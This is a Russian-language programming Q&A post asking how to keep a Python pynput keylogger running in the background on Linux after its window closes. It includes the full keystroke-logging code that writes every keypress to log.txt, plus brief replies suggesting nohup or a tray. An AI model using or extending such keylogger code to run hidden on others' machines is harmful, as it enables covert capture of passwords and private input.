# Запуск python кейлоггера в фоне. Linux

Tags: python, python-3.x, linux, pynput

```
import pynput


lst = []


def func(key):
    global lst
    lst.append(str(key).replace('\'', ''))
    if len(lst) > 0:
        log_file(lst)
        lst = []


def log_file(lst):
    with open('log.txt', 'a') as file:
        for k in lst:
            if k in s.keys():
                file.write(s[k])
            else:
                file.write(k)

s = {'Key.tab': '<TAB>', 'Key.space': '<SPACE>', '""': '\'',
                'Key.enter': '<ENTER>', 'Key.alt': '<ALT>', 'Key.caps_lock': '<CAPS>',
                'Key.delete': '<DEL>', 'Key.ctrl':'<CTRL>', 'Key.shift': '<SHIFT>', 
                'Key.esc': '<ESC>', 'Key.backspace': '<BACKSPACE>'}

listener = pynput.keyboard.Listener(on_press=func)
listener.start()
```

Надо что бы при закрытии исполняемого файла программа продолжала работать в фоне. Я использую

```
listener.start
```

но программа всё равно прекращает свою работу.

Comment: nohup..........

Comment: не, это невозможно, кейлогеры на питоне в линукс консоле....:)

Comment: Ну, есть вариант скрывать всё это в трей, но для этого надо программу собрать и установить как отдельный пакет. Да и не факт, что в Линуксе это возможно

Comment: а в консоли есть трей?

Comment: @KoVadim пока код запущен с редактора процесс висит, при закрытии окна процесс становится зомби и всё, хотя в теории должен выполнятся дальше.

Comment: нет, не должен.